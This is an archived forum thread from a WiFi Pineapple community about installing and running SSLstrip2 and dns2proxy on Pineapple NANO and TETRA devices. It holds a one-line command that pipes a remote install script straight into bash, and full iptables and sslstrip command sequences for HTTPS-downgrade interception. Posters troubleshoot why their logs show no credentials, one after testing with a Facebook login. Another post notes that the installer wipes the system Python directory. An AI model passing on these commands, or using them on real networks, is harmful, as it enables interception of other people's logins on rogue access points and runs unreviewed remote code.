Zylla Posted January 15, 2017 Share Posted January 15, 2017 SSLstrip2 + dns2proxyNow WORKING on the Pineapple NANO + TETRA.Last update: 15.01.2017Changelog: Uploaded everything to github. Install procedure: root@Pineapple:~# wget -qO- https://raw.githubusercontent.com/adde88/sslstrip-hsts-openwrt/master/INSTALL.sh | bash -s -- -v -v (This launches a install script that downloads a .ipk file containing the tools, and installs all the python-libaries correctly.) What now?sslstrip2 and dns2proxy gets installed to /usr/share/, or /sd/usr/share when using the Pineapple NANO. When using dns2proxy, please check that you traverse into its directory before launching it. (If not you might encounter errors about missing files: (nospoof.cfg) etc.) root@Pineapple:~# cd /sd/usr/share/sslstrip2/ root@Pineapple:~# python sslstrip.py --help root@Pineapple:~# cd /sd/usr/share/dns2proxy/ root@Pineapple:~# python dns2proxy.py --help Github repo. + source-files:https://github.com/adde88/sslstrip-hsts-openwrt OPKG Installation File: (For those who want to install it manually)https://github.com/adde88/sslstrip-hsts-openwrt/raw/master/sslstrip-hsts_0.9_ar71xx.ipk Link to comment Share on other sites More sharing options...
mercredi Posted January 16, 2017 Share Posted January 16, 2017 Hi, Thank you for your work! Everything works good, but a can't see any credentials on log files. Link to comment Share on other sites More sharing options...
Zylla Posted January 16, 2017 Author Share Posted January 16, 2017 1 minute ago, mercredi said: Hi, Thank you for your work! Everything works good, but a can't see any credentials on log files. Good to hear that it's working! About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it) Link to comment Share on other sites More sharing options...
mercredi Posted January 16, 2017 Share Posted January 16, 2017 First i run iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 python sslstrip.py -l 9000 -p -w log.txt python dns2proxy.py I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt sslstrip 0.9 + by Moxie Marlinspike running... + POC by Leonardo Nve Traceback (most recent call last): File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders' Traceback (most recent call last): File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders' Link to comment Share on other sites More sharing options...
killaruna Posted January 17, 2017 Share Posted January 17, 2017 when this module can be officialy download from our pineapple nano manage module? Link to comment Share on other sites More sharing options...
Zylla Posted January 17, 2017 Author Share Posted January 17, 2017 For the time being you'll need to download and use it over terminal. And i don't have a ETA on a module. But i hope to have it ready soon. :) Link to comment Share on other sites More sharing options...
Zylla Posted January 17, 2017 Author Share Posted January 17, 2017 23 hours ago, mercredi said: First i run iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 python sslstrip.py -l 9000 -p -w log.txt python dns2proxy.py I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt sslstrip 0.9 + by Moxie Marlinspike running... + POC by Leonardo Nve Traceback (most recent call last): File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders' Traceback (most recent call last): File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders' I'll do some testing later today, and see if i can replicate the issue. :) Link to comment Share on other sites More sharing options...
mercredi Posted January 17, 2017 Share Posted January 17, 2017 1 hour ago, Zylla said: I'll do some testing later today, and see if i can replicate the issue. :) thanks Which command did you use to make it work and see SSL POST? I try all option, but i can see only http. Link to comment Share on other sites More sharing options...
Zylla Posted January 19, 2017 Author Share Posted January 19, 2017 On 17.1.2017 at 6:11 PM, mercredi said: thanks Which command did you use to make it work and see SSL POST? I try all option, but i can see only http. In the iptables command you used above you are only redirecting port 80 (HTTP). You will need to redirect the HTTPS port (443) if you want to get that traffic aswell. That would explain why you're not seeing any encrypted traffic. Link to comment Share on other sites More sharing options...
Zylla Posted January 20, 2017 Author Share Posted January 20, 2017 It seems like i might have slept to little the last week, lol. You're not supposed to redirect port 443. echo "1" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 python dns2proxy.py -i $interface_name_here python sslstrip.py -a -w /tmp/sslstrip_log (replace "$interface_name_here" with the interface you are using) Here's the usage of both tools:sslstrip+ sslstrip 0.9 + by Moxie Marlinspike Version + by Leonardo Nve Usage: sslstrip <options> Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message. dns2proxy: usage: dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S] [-A ADMINIP] optional arguments: -h, --help show this help message and exit -N, --noforward DNS Fowarding OFF (default ON) -i INTERFACE, --interface INTERFACE Interface to use -u IP1, --ip1 IP1 First IP to add at the response -d IP2, --ip2 IP2 Second IP to add at the response -I IPS, --ips IPS List of IPs to add after ip1,ip2 separated with commas -S, --silent Silent mode -A ADMINIP, --adminIP ADMINIP Administrator IP for no filtering Link to comment Share on other sites More sharing options...
crazyclown Posted January 20, 2017 Share Posted January 20, 2017 Will this work on the Mark V Firmware 2.4? Link to comment Share on other sites More sharing options...
Grognak Posted January 24, 2017 Share Posted January 24, 2017 What is the exact command to see encrypted traffic? On 1/16/2017 at 8:07 AM, Zylla said: Good to hear that it's working! About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it) Link to comment Share on other sites More sharing options...
mercredi Posted January 25, 2017 Share Posted January 25, 2017 12 hours ago, Grognak said: What is the exact command to see encrypted traffic? echo "1" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 python dns2proxy.py -i $interface_name_here python sslstrip.py -a -w /tmp/sslstrip_log Link to comment Share on other sites More sharing options...
Zylla Posted January 27, 2017 Author Share Posted January 27, 2017 On 20.1.2017 at 7:18 PM, crazyclown said: Will this work on the Mark V Firmware 2.4? Sadly my Mark VI is dead, but i am pretty certain that one guy in this thread tested it, and mentioned that it was working. You could just test it and report back. I don't see any special reasons for it not working. Link to comment Share on other sites More sharing options...
Null Trace Posted February 7, 2017 Share Posted February 7, 2017 I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning. Link to comment Share on other sites More sharing options...
parmaster Posted February 9, 2017 Share Posted February 9, 2017 On 2/8/2017 at 2:00 AM, Null Trace said: I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning. Hey Null Trace, you can have it running in the background if you install screen. You can install this by using: opkg install screen and then when you ssh in run screen first, by typing 'screen' and then run the commands and before disconnecting hitting CTRL-A and then D. To retrieve your screen session type 'screen -r' if you have more then one screen instance it will list them and you will need to type 'screen -r 4322' for example. If you want to close a screen instance retrieve it as above and type 'exit'. As for running DWall etc I'm note sure if it will work alongside sorry :) Hope this helps. Link to comment Share on other sites More sharing options...
Scrag Posted February 14, 2017 Share Posted February 14, 2017 Hello, I "seem" to have this working, as in no errors and I can see all the dnsproxy info flashing accross the screen. I am not able to capture any passwords (i did a test with facebook.com and typed in a bogus email and password). I also used tcpdump and looked at the results. My data is still encrypted so thats why I cannot see my email address or password. Anyone have any ideas? Below are the commands I'm using. echo "1" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 python dns2proxy.py -i wlan0 python sslstrip.py -a -w /tmp/sslstrip_log * wlan0 is the interface im hosting my AP on. Please see attachment for networking screen. Thanks!! Scrag Link to comment Share on other sites More sharing options...
Scrag Posted February 18, 2017 Share Posted February 18, 2017 Hey Everybody. I was really hoping someone could help a noob out ;) I "almost" got this working but I am stuck. It appears dns2proxy is working but sslstrip is not. Sslstrip just sits there after loading and does not display any info, and of course, does not strip ssl. Here is what I'm doing: echo "1" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 cd /sd/usr/share/dns2proxy/ python dns2proxy.py cd /sd/usr/share/sslstrip2/ python sslstrip.py -a -w /sd/ssltrip-log.txt I can visually see all kinds of responses on the dns2proxy screen, but for sslstrip, it just sits at sslstrip 0.9 + by Moxie Marlinspike running... + POC by Leonardo Nve Any thoughts? Thanks! Scrag Link to comment Share on other sites More sharing options...
Zylla Posted March 3, 2017 Author Share Posted March 3, 2017 Okey. To clear things up a bit. SSLstrip2 + dns2proxy does not work on every site. Good examples are Google and Facebook. Browsers and sites have implemented fixes against this attack, like caching. But it does have more success-chance compared to regular boring sslstrip :) Link to comment Share on other sites More sharing options...
Tar Posted March 10, 2017 Share Posted March 10, 2017 Any news on updates like a module or something sweet? Would very much like to see a module :P Link to comment Share on other sites More sharing options...
Zylla Posted March 14, 2017 Author Share Posted March 14, 2017 On 10.3.2017 at 5:16 AM, Tar said: Any news on updates like a module or something sweet? Would very much like to see a module :P Hi there! I do have plans for making a module. It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.). The module for the Mana Toolkit is my main project at the moment. I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack. I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy. But it seems it could really need a module. So hopefully i got something soon :) Link to comment Share on other sites More sharing options...
Tar Posted March 15, 2017 Share Posted March 15, 2017 On 3/14/2017 at 8:23 AM, Zylla said: Hi there! I do have plans for making a module. It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.). The module for the Mana Toolkit is my main project at the moment. I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack. I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy. But it seems it could really need a module. So hopefully i got something soon :) Hehe, yeah man a module would be great :P One of the main reasons I got the wifipineapple was to use SSLstrip on my network, take your time lad looking for some great things out of this community :) Link to comment Share on other sites More sharing options...
Dirty Frank Posted March 16, 2017 Share Posted March 16, 2017 To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO. Link to comment Share on other sites More sharing options...
Zylla Posted March 16, 2017 Author Share Posted March 16, 2017 2 minutes ago, Dirty Frank said: To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO. You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7) I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card. For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory. But i guess, i can create warning message in the installer-script. Just in case :) Link to comment Share on other sites More sharing options...
Dirty Frank Posted March 16, 2017 Share Posted March 16, 2017 2 hours ago, Zylla said: You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7) I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card. For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory. But i guess, i can create warning message in the installer-script. Just in case :) How about the installer symlink the installed files instead of the directory iteself (ala install the pkg to /sd and then "ln -s /sd/usr/lib/python2.7/* /usr/lib/python2.7" ? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.